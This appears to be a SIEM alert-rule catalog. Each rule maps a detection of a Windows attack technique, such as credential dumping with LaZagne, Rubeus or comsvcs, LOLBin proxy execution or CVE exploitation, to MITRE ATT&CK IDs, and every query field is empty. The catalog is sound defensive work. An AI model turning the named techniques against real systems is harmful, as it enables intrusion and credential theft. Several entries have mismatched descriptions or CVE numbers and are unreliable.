Trigger Condition: Modification of registry entries related to winlogon.exe to load and execute possible malicious DLLs and/or executables is detected.
ATT&CK Category: Persistence
ATT&CK Tag: Boot or Logon Autostart Execution, Winlogon Helper DLL
ATT&CK ID: T1547, T1547.004
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_WMI Backdoor Exchange Transport Agent
Trigger Condition: A WMI backdoor in the Exchange Server Software Component and Transport Agents via WMI event filters is detected.
ATT&CK Category: Privilege Escalation, Persistence
ATT&CK Tag: Event Triggered Execution, Windows Management Instrumentation Event Subscription
ATT&CK ID: T1546, T1546.003
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_WMI Modules Loaded by Suspicious Process
Trigger Condition: Loading of WMI modules by suspicious processes, such as a binary run from ProgramData. Legitimate system processes and third-party utilities use WMI extensively, so we recommend whitelisting to reduce false positive flooding. Also, do not monitor C:\Windows*, as the extensive whitelisting required may hamper the query’s performance.
ATT&CK Category: Execution
ATT&CK Tag: Windows Management Instrumentation
ATT&CK ID: T1047
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_WMI Persistence - Script Event Consumer File Write
Trigger Condition: File writes of WMI script event consumer are detected.
ATT&CK Category: Privilege Escalation
ATT&CK Tag: Event Triggered Execution, Windows Management Instrumentation Event Subscription
ATT&CK ID: T1546, T1546.003
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Wsreset UAC Bypass Detected
Trigger Condition: A method that uses the Wsreset.exe tool to reset the Windows Store bypassing UAC is detected.
ATT&CK Category: Privilege Escalation, Defense Evasion
ATT&CK Tag: Abuse Elevation Control Mechanism, Bypass User Access Control
ATT&CK ID: T1548, T1548.002
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_ZOHO Dctask64 Process Injection Detected
Trigger Condition: This alert is triggered whenever it detects suspicious process injection using ZOHO’s dctask64.exe.
ATT&CK Category: Defense Evasion, Privilege Escalation
ATT&CK Tag: Process Injection
ATT&CK ID: T1055
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_APT 34 Initial Access Using Spearphishing Link Detected
Trigger Condition: An attempt to gain an initial foothold within the network via a spearphishing link matching IoCs related to APT34 is detected. For the alert to work, it uses the lists IRANIAN_SPEARPHISHING_DOMAINS and IRANIAN_SPEARPHISHING_IP.
ATT&CK Category: Initial Access
ATT&CK Tag: Spearphishing Link
ATT&CK ID: T1566
Minimum Log Source Requirement: EmailServer
Query:
LP_Suspicious File Deletion Detected
Trigger Condition: Adversaries remove files that leave a trail of an intrusion to keep their footprint low, or remove them at the end as part of post-intrusion cleanup. For the alert to work, you must configure ACLs on the paths and extensions you want to monitor for deletion operations.
ATT&CK Category: Defense Evasion
ATT&CK Tag: File Deletion
ATT&CK ID: T1070.004
Minimum Log Source Requirement: Windows
Query:
LP_Security Software Discovery Process Detected
Trigger Condition: Adversaries attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system.
ATT&CK Category: Discovery
ATT&CK Tag: Security Software Discovery
ATT&CK ID: T1518
Minimum Log Source Requirement: Windows
Query:
LP_System Network Connections Discovery
Trigger Condition: This alert is triggered whenever discovery of network connections via system utilities such as netstat, net, etc. is detected.
ATT&CK Category: Discovery
ATT&CK Tag: System Network Connections Discovery
ATT&CK ID: T1049
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Exfiltration over Cloud Application Detected
Trigger Condition: Adversaries perform data exfiltration with a protocol different from the main Command and Control protocol or channel.
ATT&CK Category: Exfiltration
ATT&CK Tag: Exfiltration Over Alternative Protocol
ATT&CK ID: T1048
Minimum Log Source Requirement: ProxyServer
Query:
LP_Remote File Copy Detected
Trigger Condition: Files are copied from one system to another to stage adversary tools or other files throughout an operation.
ATT&CK Category: Lateral Movement
ATT&CK Tag: Remote File Copy
ATT&CK ID: T1105
Minimum Log Source Requirement: Windows
Query:
LP_Privilege Escalation - Bypassing User Account Control Detected
Trigger Condition: Adversaries use techniques to elevate a user’s privileges to administrator by manipulating UAC if the target process is unprotected.
ATT&CK Category: Privilege Escalation
ATT&CK Tag: Bypass User Account Control
ATT&CK ID: T1548
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Process Execution from Suspicious Location
Trigger Condition: Execution of a process from a suspicious location.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Masquerading
ATT&CK ID: T1036
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Active Directory Enumeration via ADFind
Trigger Condition: Enumeration of Active Directory using the AdFind tool. AdFind is a CLI-based utility that can be used for gathering information from Active Directory, such as organizational units, users, computers, and groups. Adversaries can use this utility to gather information related to the Active Directory.
ATT&CK Category: Execution
ATT&CK Tag: Command and Scripting Interpreter, PowerShell
ATT&CK ID: T1059, T1059.001
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Possible Command Prompt Process Hollowing
Trigger Condition: Possible process hollowing of the command prompt using applications such as net.exe, nltest.exe or ipconfig is detected. Adversaries inject malicious code into suspended and hollowed processes to evade process-based defenses.
ATT&CK Category: Defense Evasion, Privilege Escalation
ATT&CK Tag: Process Injection, Process Hollowing
ATT&CK ID: T1055, T1055.012
Minimum Log Source Requirement: Windows
Query:
LP_Suspicious Taskkill Activity
Trigger Condition: Multiple processes terminated in a short time via taskkill command that may signal malicious activity like ransomware.
ATT&CK Category: Impact
ATT&CK Tag: Service Stop
ATT&CK ID: T1489
Minimum Log Source Requirement: Windows
Query:
LP_Ryuk Wake-On-LAN Activity
Trigger Condition: Ryuk’s Wake-On-LAN activity is detected.
Minimum Log Source Requirement: Windows
Query:
LP_EXE or DLL Dropped in Perflogs Folder
Trigger Condition: An EXE or DLL file is dropped in the Windows PerfLogs directory.
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Credential Access via LaZagne
Trigger Condition: Credential access via the popular open-source LaZagne tool is detected.
ATT&CK Category: Credential Access
ATT&CK Tag: OS Credential Dumping, LSASS Memory
ATT&CK ID: T1003, T1003.001
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_RDP Connection Initiated from Domain Controller
Trigger Condition: Initiation of an RDP connection from a domain controller.
ATT&CK Category: Lateral Movement
ATT&CK Tag: Remote Services, Remote Desktop Protocol
ATT&CK ID: T1021, T1021.001
Minimum Log Source Requirement: Windows
Query:
LP_Active Directory Module Load in PowerShell
Trigger Condition: Active Directory module is loaded via PowerShell.
ATT&CK Category: Execution
ATT&CK Tag: Command and Scripting Interpreter, PowerShell
ATT&CK ID: T1059, T1059.001
Minimum Log Source Requirement: Windows, PowerShell
Query:
LP_Possible Active Directory Enumeration via AD Module
Trigger Condition: Command related to retrieving the last logon date of a computer in an Active Directory (AD).
ATT&CK Category: Execution, Discovery
ATT&CK Tag: Remote System Discovery, Command and Scripting Interpreter, PowerShell
ATT&CK ID: T1018, T1059, T1059.001
Minimum Log Source Requirement: Windows, PowerShell
Query:
LP_Microsoft Defender Disabling Attempt via PowerShell
Trigger Condition: Attempt to disable Microsoft Defender via PowerShell.
ATT&CK Category: Defense Evasion, Execution
ATT&CK Tag: Impair Defenses, Disable or Modify Tools, Command and Scripting Interpreter, PowerShell
ATT&CK ID: T1562, T1562.001, T1059, T1059.001
Minimum Log Source Requirement: Windows, PowerShell
Query:
LP_Possible Kerberoasting via Rubeus
Trigger Condition: A Kerberoasting attack via the popular open-source tool Rubeus.
ATT&CK Category: Credential Access
ATT&CK Tag: Steal or Forge Kerberos Tickets, Kerberoasting
ATT&CK ID: T1558, T1558.003
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Suspicious Scheduled Task Creation
Trigger Condition: Creation of a suspicious scheduled task in a Windows endpoint. Adversaries may abuse the Windows Task Scheduler to perform task scheduling for the initial or recurring execution of malicious code to achieve persistence, lateral movement, execution, detection evasion, and privilege escalation. Also, it is prevalent among ransomware to use public directories for scheduled task creation.
ATT&CK Category: Persistence
ATT&CK Tag: Scheduled Task
ATT&CK ID: T1053.005
Minimum Log Source Requirement: Windows
Query:
LP_RDP Connection Initiated from Suspicious Country
Trigger Condition: Initiation of an RDP connection from a domain controller is detected.
ATT&CK Category: Defense Evasion, Persistence, Privilege Escalation, Initial Access
ATT&CK Tag: Valid Accounts, Domain Accounts
ATT&CK ID: T1078, T1078.002
Minimum Log Source Requirement: Windows
Query:
LP_Scheduled Task Deletion
Trigger Condition: Deletion of a scheduled task using the schtasks utility with the delete command is detected.
ATT&CK Category: Execution
ATT&CK Tag: Scheduled Task
ATT&CK ID: T1053.005
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Exchange Remote Code Execution CVE-2020-0688 Attempt
Trigger Condition: A remote code execution attempt via CVE-2020-0688 in Microsoft Exchange is detected.
ATT&CK Category: Initial Access
ATT&CK Tag: External Remote Services
ATT&CK ID: T1133
Minimum Log Source Requirement: Firewall, Proxy Server
Query:
LP_BlueKeep Vulnerability CVE-2019-0708 Exploitation
Trigger Condition: Exploitation of BlueKeep, a Remote Desktop Services remote code execution vulnerability also known as CVE-2019-0708, is detected.
ATT&CK Category: Lateral Movement
ATT&CK Tag: Exploitation of Remote Services
ATT&CK ID: T1210
Minimum Log Source Requirement: IDS/IPS
Query:
LP_ZoHo ManageEngine Pre-Auth File Upload CVE-2019-8394 Exploitation Attempt
Trigger Condition: A pre-auth file upload vulnerability CVE-2019-8394 in ZoHo ManageEngine ServiceDesk Plus is detected.
ATT&CK Category: Initial Access
ATT&CK Tag: Exploit Public-Facing Application
ATT&CK ID: T1190
Minimum Log Source Requirement: Firewall, Proxy Server
Query:
LP_ZoHo ManageEngine Desktop Central CVE-2020-10189 Exploitation Attempt
Trigger Condition: A remote code execution attempt via CVE-2019-11580 in ZoHo ManageEngine Desktop Central is detected.
ATT&CK Category: Initial Access
ATT&CK Tag: Exploit Public-Facing Application
ATT&CK ID: T1190
Minimum Log Source Requirement: Firewall, Proxy Server
Query:
LP_Fortinet Pre-Auth File Read CVE-2018-13379 Exploitation Attempt
Trigger Condition: Exploitation of the pre-auth file read vulnerability (CVE-2018-13379) in Fortinet FortiOS is detected.
ATT&CK Category: Initial Access
ATT&CK Tag: External Remote Services
ATT&CK ID: T1133
Minimum Log Source Requirement: Firewall, Proxy Server
Query:
LP_Adobe ColdFusion Remote Code Execution CVE-2018-15961 Attempt
Trigger Condition: Exploitation of an arbitrary file upload vulnerability (CVE-2018-15961) in Adobe ColdFusion to upload a JSP webshell for remote code execution is detected.
ATT&CK Category: Initial Access
ATT&CK Tag: Exploit Public-Facing Application
ATT&CK ID: T1190
Minimum Log Source Requirement: Firewall, Proxy Server
Query:
LP_Default Hard disk Usage Status
Trigger Condition: Hard disk usage is greater than or equal to 80% of its storage.
Minimum Log Source Requirement: Logpoint
Query:
LP_Default License Grace State
Trigger Condition: Logpoint’s license has expired and it is operating in the grace state.
Minimum Log Source Requirement: Logpoint
Query:
LP_Default License Invalid
Trigger Condition: Logpoint’s license is no longer valid.
Minimum Log Source Requirement: Logpoint
Query:
LP_Microsoft Build Engine Loading Credential Libraries
Trigger Condition: Loading of credential libraries such as vaultcli.dll and SAMLib.dll by MS Build engine is detected.
ATT&CK Category: Credential Access
ATT&CK Tag: OS Credential Dumping, Security Account Manager
ATT&CK ID: T1003, T1003.002
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Potential Phishing Attack Detected
Trigger Condition: A phishing attack is detected.
ATT&CK Category: Initial Access
ATT&CK Tag: Phishing, Spearphishing Attachment
ATT&CK ID: T1566, T1566.001
Minimum Log Source Requirement: MailServer
Query:
LP_Safe DLL Search Mode Disabled
Trigger Condition: Safe DLL search mode is disabled.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Impair Defenses, Disable or Modify Tools
ATT&CK ID: T1562, T1562.001
Minimum Log Source Requirement: Windows
Query:
LP_Potential Intrusion Detected
Trigger Condition: An intrusion is detected by IDS or IPS devices.
ATT&CK Category: Command and Control, Defense Evasion
ATT&CK Tag: Proxy, Exploitation for Defense Evasion
ATT&CK ID: T1090, T1211
Minimum Log Source Requirement: -
Query:
LP_Windows Crash Dump Disabled
Trigger Condition: The Windows crash dump registry setting is disabled.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Modify Registry
ATT&CK ID: T1112
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Suspicious Shells Spawn by SQL Server
Trigger Condition: A suspicious shell process is spawned by the SQL Server process, which may indicate exploitation of a vulnerability.
ATT&CK Category: Initial Access, Execution
ATT&CK Tag: Exploit Public-Facing Application, PowerShell
ATT&CK ID: T1190, T1059.001
Minimum Log Source Requirement: Windows
Query:
LP_Suspicious Microsoft SQL Server PowerShell Module Use Detected
Trigger Condition: This alert detects the execution of PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with MSSQL Server. Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of those logs.
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_UltraVNC Execution via Command Line
Trigger Condition: Execution of UltraVNC via the command line. Gamaredon is known to use this technique to gain remote access.
ATT&CK Category: Command and Control
ATT&CK Tag: Remote Access Software
ATT&CK ID: T1219
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Office Security Settings Changed
Trigger Condition: Modification of Microsoft Office security settings in the registry.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Modify Registry
ATT&CK ID: T1112
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Microsoft Defender AMSI Trigger
Trigger Condition: Triggering of Microsoft Defender with AMSI as the detection source. AMSI is agnostic of antimalware vendors and is designed to allow for the most common malware scanning and protection techniques.
Minimum Log Source Requirement: Windows
Query:
LP_Actinium IoC Domains Detected
Trigger Condition: Any Actinium IoC domain match is found. IoC reference: the indicators are current up to Feb 2022.
Minimum Log Source Requirement: IDS, IPS, Firewall
Query:
LP_Impacket PsExec Execution
Trigger Condition: Execution of Impacket’s PsExec utility. Impacket is a collection of Python classes that work with network protocols. It is focused on providing low-level programmatic access to the packets and is commonly used in PoCs.
ATT&CK Category: Lateral Movement
ATT&CK Tag: Lateral Tool Transfer
ATT&CK ID: T1570
Minimum Log Source Requirement: Windows
Query:
LP_Oracle WebLogic CVE-2021-2109 Exploitation
Trigger Condition: Possible exploitation of the Oracle WebLogic server vulnerability CVE-2021-2109 is detected. This vulnerability allows a high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server.
ATT&CK Category: Initial Access
ATT&CK Tag: Exploit Public-Facing Application
ATT&CK ID: T1190
Minimum Log Source Requirement: Firewall, Proxy Server
Query:
LP_PowerView PowerShell Commandlets
Trigger Condition: Execution of PowerShell commandlets of the popular PowerView module of the PowerSploit framework is detected. For the alert to work, the script block logging must be enabled.
ATT&CK Category: Execution
ATT&CK Tag: Command and Scripting Interpreter, PowerShell
ATT&CK ID: T1059, T1059.001
Minimum Log Source Requirement: Windows
Query:
LP_Stealthy VSTO Persistence
Trigger Condition: Modification of Office product add-in and VSTO inclusion registry keys. By modifying these registry keys, adversaries can execute their payload through a malicious add-in. Registry auditing is required.
ATT&CK Category: Persistence
ATT&CK Tag: Add-ins, Office Application Startup
ATT&CK ID: T1137.006, T1137
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Suspicious VMToolsd Child Process
Trigger Condition: Creation of a suspicious child process of the VMware Tools process, which may indicate persistence set up by attackers.
ATT&CK Category: Execution
ATT&CK Tag: Command and Scripting Interpreter
ATT&CK ID: T1059
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Suspicious WMPRVSE Child Process
Trigger Condition: This alert is triggered whenever an uncommon or suspicious child process of the legitimate Windows Management Instrumentation Provider Service is detected. Attackers may leverage WMI (Windows Management Instrumentation) to execute commands and perform various tasks, such as evading detection or bypassing security controls on a target system.
ATT&CK Category: Execution, Defense Evasion
ATT&CK Tag: Windows Management Instrumentation, Malicious File, Regsvr32
ATT&CK ID: T1047, T1204.002, T1218.010
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_VMware VSphere CVE-2021-21972 Exploitation
Trigger Condition: The exploitation of VSphere Remote Code Execution vulnerability CVE-2021-21972 is detected.
ATT&CK Category: Initial Access
ATT&CK Tag: Exploit Public-Facing Application
ATT&CK ID: T1190
Minimum Log Source Requirement: Firewall, Proxy Server
Query:
LP_Zoho ManageEngine ADSelfService Plus CVE-2021-40539 Exploitation
Trigger Condition: The REST API authentication bypass vulnerability (CVE-2021-40539) in Zoho ManageEngine ADSelfService Plus (v6113 and prior) is detected. For the detection to work, administrators must fetch logs from the \ManageEngine\ADSelfService Plus\logs path.
ATT&CK Category: Initial Access, Persistence
ATT&CK Tag: Exploit Public-Facing Application, Web Shell
ATT&CK ID: T1190, T1505.003
Minimum Log Source Requirement: Web Server
Query:
LP_Possible Access to ADMIN Share
Trigger Condition: Access to the ADMIN$ share, which may help detect lateral movement attempts. Since Windows admin share activity is so common, it provides adversaries with a powerful, discreet way to move laterally within an environment. Legitimate administrative activities may generate false positives and will require whitelisting.
ATT&CK Category: Lateral Movement
ATT&CK Tag: SMB/Windows Admin Shares
ATT&CK ID: T1021.002
Minimum Log Source Requirement: Windows
Query:
LP_PsExec Tool Execution Detected
Trigger Condition: PsExec service installation and execution events (service and Sysmon) are detected.
ATT&CK Category: Execution
ATT&CK Tag: System Services, Service Execution
ATT&CK ID: T1569, T1569.002
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Screensaver Activities Detected
Trigger Condition: An adversary’s modification of the registry key containing the path to the binary used as the screensaver executable, done to establish persistence, is detected.
ATT&CK Category: Persistence
ATT&CK Tag: Event Triggered Execution, Screensaver
ATT&CK ID: T1546, T1546.002
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Suspect Svchost Activity Detected
Trigger Condition: Suspect svchost activity is detected. It is abnormal for svchost.exe to spawn without any CLI arguments; this is normally observed when a malicious process spawns it and injects code into its memory space.
ATT&CK Category: Privilege Escalation, Defense Evasion
ATT&CK Tag: Process Injection
ATT&CK ID: T1055
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Time-Stomping of Users Directory Files Detected
Trigger Condition: Time-stomping of a user directory file is detected. Sysmon can only detect a change of CreationTime, not of LastWriteTime or LastAccessTime. Whitelisting legitimate noisy processes such as browsers, Slack, or Teams is required to reduce false positives.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Indicator Removal on Host, Timestomp
ATT&CK ID: T1070, T1070.006
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Windows Defender Exclusion Set Detected
Trigger Condition: A Windows Defender exclusion is added in the registry, allowing an entity to bypass Windows Defender antivirus scanning.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Impair Defenses, Disable or Modify Tools
ATT&CK ID: T1562, T1562.001
Minimum Log Source Requirement: Windows
Query:
LP_Suspicious Netsh DLL Persistence Detected
Trigger Condition: Persistence via a Netsh Helper DLL is detected.
ATT&CK Category: Privilege Escalation
ATT&CK Tag: Netsh Helper DLL
ATT&CK ID: T1546.007
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Usage of Procdump Detected
Trigger Condition: Suspicious use of the SysInternals ProcDump utility tool is detected.
ATT&CK Category: Credential Access
ATT&CK Tag: OS Credential Dumping, LSASS Memory
ATT&CK ID: T1003, T1003.001
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Conhost Spawning Suspicious Processes
Trigger Condition: conhost.exe spawns other processes.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Indirect Command Execution
ATT&CK ID: T1202
Minimum Log Source Requirement: Windows
Query:
LP_Wlrmdr Lolbin Use as Launcher
Trigger Condition: wlrmdr.exe is used to proxy launch other executables.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Indirect Command Execution
ATT&CK ID: T1202
Minimum Log Source Requirement: Windows
Query:
LP_Suspicious Process Execution via Pester Detected
Trigger Condition: Execution of code via Pester.bat. Pester is a PowerShell module for testing purposes. Adversaries can use Pester.bat to execute other processes. Still, legitimate use of Pester for writing tests for PowerShell scripts and modules could sometimes trigger false positives.
ATT&CK Category: Execution
ATT&CK Tag: PowerShell
ATT&CK ID: T1059.001
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Root Certificate Installation Detected
Trigger Condition: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary-controlled web servers. This alert can detect the installation of a root certificate.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Install Root Certificate
ATT&CK ID: T1553.004
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Suspicious process spawned by FTP
Trigger Condition: Manipulation of ftp.exe to spawn a new process for file transfer. The alert detects renamed ftp.exe, ftp.exe script execution, and child processes run by ftp.exe.
ATT&CK Category: Execution, Defense Evasion
ATT&CK Tag: Command and Scripting Interpreter, Indirect Command Execution
ATT&CK ID: T1059, T1202
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Chromeloader Cross-Process Injection to Load Extension
Trigger Condition: Chromeloader uses process injection via PowerShell and loads its malicious extension into Chrome. This alert is triggered when this exact scenario occurs.
ATT&CK Category: Execution, Persistence, Privilege Escalation
ATT&CK Tag: Process Injection, PowerShell, Browser Extensions
ATT&CK ID: T1055, T1059.001, T1176
Minimum Log Source Requirement: Windows
Query:
LP_Proxy Execution via Explorer
Trigger Condition: Explorer is used to proxy execution. Explorer is the Microsoft Windows GUI shell used for task-based file management. Adversaries use Explorer to proxy the execution of other commands or processes, evading defense mechanisms.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Indirect Command Execution
ATT&CK ID: T1202
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Suspicious Root Certificate installation Detected
Trigger Condition: This alert is triggered whenever installation of a root certificate is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Install Root Certificate
ATT&CK ID: T1553.004
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Windows Logon Reminder Usage as Launcher
Trigger Condition: Manipulation of Wlrmdr to proxy-launch other executables. Wlrmdr (Windows Logon Reminder) is a Microsoft Windows binary used to display messages when logging in. Adversaries generally use Wlrmdr to pass parameters to ShellExecute.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Indirect Command Execution
ATT&CK ID: T1202
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Suspicious File Transfer Using Replace
Trigger Condition: Replace is used to transfer files (copy or download them). Replace.exe is a Microsoft Windows executable that replaces existing files in a directory or, when used with the /a option, adds new ones. Adversaries use the replace process to silently download or copy files onto the target system.
ATT&CK Category: Defense Evasion
ATT&CK Tag: T1105 - Ingress Tool Transfer
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Proxy Execution via Program Compatibility Wizard
Trigger Condition: The Pcwrun process is used to initiate a proxy execution. Pcwrun is a Microsoft Windows operating system file used to invoke the Program Compatibility Troubleshooter/Wizard. Adversaries use pcwrun to proxy the execution of other commands, processes, or executables in order to evade defense mechanisms. However, the specific focus needs to be on outlier events, for example unique counts, instead of commonly seen artifacts to prevent false positives.
ATT&CK Category: Defense Evasion
ATT&CK Tag: T1218 - Signed Binary Proxy Execution
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Suspicious Driver Installation via PnPUtil
Trigger Condition: The Pnputil process is used to install or add drivers. PnPUtil is a Microsoft Windows process that lets an administrator perform actions on driver packages. Adversaries use pnputil to install or add malicious drivers. Anyone who uses pnputil.exe who is not a system administrator should be investigated, even when they have system change permissions.
ATT&CK Category: Persistence
ATT&CK Tag: T1547 - Boot or Logon Autostart Execution, T1547.006 - Kernel Modules and Extensions
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Application Whitelisting Bypass via PresentationHost
Trigger Condition: The PresentationHost process is used to execute browser applications. PresentationHost is a Microsoft Windows application that enables the hosting of WPF applications in compatible browsers (including Microsoft Internet Explorer 6 and later). Adversaries use presentationhost.exe to evade application whitelisting and execute malicious XAML Browser Application (XBAP) files.
ATT&CK Category: Defense Evasion
ATT&CK Tag: T1218 - Signed Binary Proxy Execution
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Suspicious File Extraction via Expand Detected
Trigger Condition: The Expand process is used for file transfer (copying or downloading files). Expand is a Microsoft Windows binary that can extract one or more compressed files and retrieve them from distribution disks. Adversaries use expand to silently download or copy files into the target system or location.
ATT&CK Category: Defense Evasion, Command and Control
ATT&CK Tag: T1105 - Ingress Tool Transfer, T1218 - Signed Binary Proxy Execution
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Suspicious Use of Extrac32 Detected
Trigger Condition: This alert is triggered when a suspicious file overwrite using extrac32.exe is detected.
ATT&CK Category: Command and Control
ATT&CK Tag: Ingress Tool Transfer
ATT&CK ID: T1105
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Shell spawn via HTML Help Detected
Trigger Condition: Hh (HTML Help) spawns shell processes. Hh.exe is a Microsoft Windows executable that allows developers to compile .chm file(s) with expanding tables of contents, shortcuts, keyword search, and pop-up topics. Adversaries use Hh as a target for overwriting and executing their malicious commands, spawning other processes.
ATT&CK Category: Execution, Defense Evasion
ATT&CK Tag: T1047 - Windows Management Instrumentation, T1218.001 - Compiled HTML File
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_DLL Injection with Tracker Detected
Trigger Condition: This alert rule is triggered whenever DLL injection with tracker process is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: T1055.001 - Dynamic-link Library Injection
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Malicious PE Execution by Microsoft Visual Studio Debugger
Trigger Condition: An arbitrary PowerShell command is executed via SyncAppvPublishingServer. VBScript files such as SyncAppvPublishingServer.vbs are trusted scripts, often signed with certificates. Adversaries can use SyncAppvPublishingServer.vbs to proxy-execute PowerShell code.
ATT&CK Category: Defense Evasion
ATT&CK Tag: T1218 - Signed Binary Proxy Execution
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_DLL loaded Via Certoc Binary Detected
Trigger Condition: DLL loading via the certoc binary is detected. Certoc is a Windows internal binary used to install certificates, but it also has a feature to load a DLL via the LoadDll tag. Adversaries can use the certoc binary to load their malicious DLL even when they don’t have the relevant access rights.
ATT&CK Category: Defense Evasion
ATT&CK Tag: T1218 - Signed Binary Proxy Execution
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
Trigger Condition: This alert is triggered when aspnet_compiler is used to build a C# program natively.
ATT&CK Category: Defense Evasion
ATT&CK Tag: T1127 - Trusted Developer Utilities Proxy Execution
Minimum Log Source Requirement: Windows
Query:
LP_Suspicious Invocation PowerShell Diagnostic Script Execution
Trigger Condition: This alert detects execution of malicious payloads via SyncInvoke in CL_Invocation.ps1 module.
ATT&CK Category: Defense Evasion
ATT&CK Tag: T1216 - Signed Script Proxy Execution
Minimum Log Source Requirement: Windows
Query:
LP_Registry Configured RunOnce Task Execution
Trigger Condition: This alert is triggered when a RunOnce task configured in the registry executes, or when the configuration of the RunOnce registry key is changed.
ATT&CK Category: Defense Evasion
ATT&CK Tag: T1112 - Modify Registry
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Suspicious WSL Bash Execution
Trigger Condition: This alert is triggered whenever it detects execution of Microsoft bash launcher with the “-c” flag.
ATT&CK Category: Defense Evasion
ATT&CK Tag: T1202 - Indirect Command Execution
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Usage of Csharp or Roslyn Csharp Interactive Console
Trigger Condition: Usage of the csi or rcsi binary is detected. Adversaries can use these binaries to execute their malicious C# code.
ATT&CK Category: Execution
ATT&CK Tag: Software Deployment Tools, System Binary Proxy Execution
ATT&CK ID: T1072, T1218
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Possible Commandline Obfuscation Detected
Trigger Condition: This alert is triggered whenever suspicious characters are detected in the command indicating possible obfuscation of commands.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Obfuscated Files or Information
ATT&CK ID: T1027
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Use of Control Panel Items
Trigger Condition: This alert is triggered whenever malicious use of a control panel item is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Control Panel
ATT&CK ID: T1218.002
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Use of Colorcpl Detected
Trigger Condition: Suspicious usage of the colorcpl binary, such as execution from a non-default path and creation of unusual files, is detected.
ATT&CK Category: Persistence
ATT&CK Tag: T1574.001 - DLL Search Order Hijacking
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious File Download via Certreq
Trigger Condition: This alert is triggered whenever a file is downloaded using the certreq binary.
ATT&CK Category: Command and Control
ATT&CK Tag: T1105 - Ingress Tool Transfer
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Process Dump via Rundll32 and Comsvcs
Trigger Condition: This alert is triggered whenever a process dump using Rundll32 with Comsvcs DLL is detected.
ATT&CK Category: Defense Evasion, Credential Access
ATT&CK Tag: LSASS Memory, Rundll32
ATT&CK ID: T1003.001, T1218.011
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious MachineGUID Query Detected
Trigger Condition: When reg.exe is used to query the machine GUID. Reg.exe is a Windows binary that performs operations on registry subkey information and values in registry entries. MachineGuid is a unique identifier for a machine. Adversaries can use this technique to obtain the MachineGuid value. Ransomware also abuses this technique to keep track of infected systems using a unique ID.
ATT&CK Category: Discovery
ATT&CK Tag: T1082 - System Information Discovery
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Process Injection Via Mavinject Detected
Trigger Condition: When a DLL is injected into a running process. Microsoft Application Virtualization Injector (Mavinject) is a Windows utility that can inject code into external processes as part of Microsoft Application Virtualization (App-V). Adversaries can use mavinject to inject a malicious DLL to obtain arbitrary code execution.
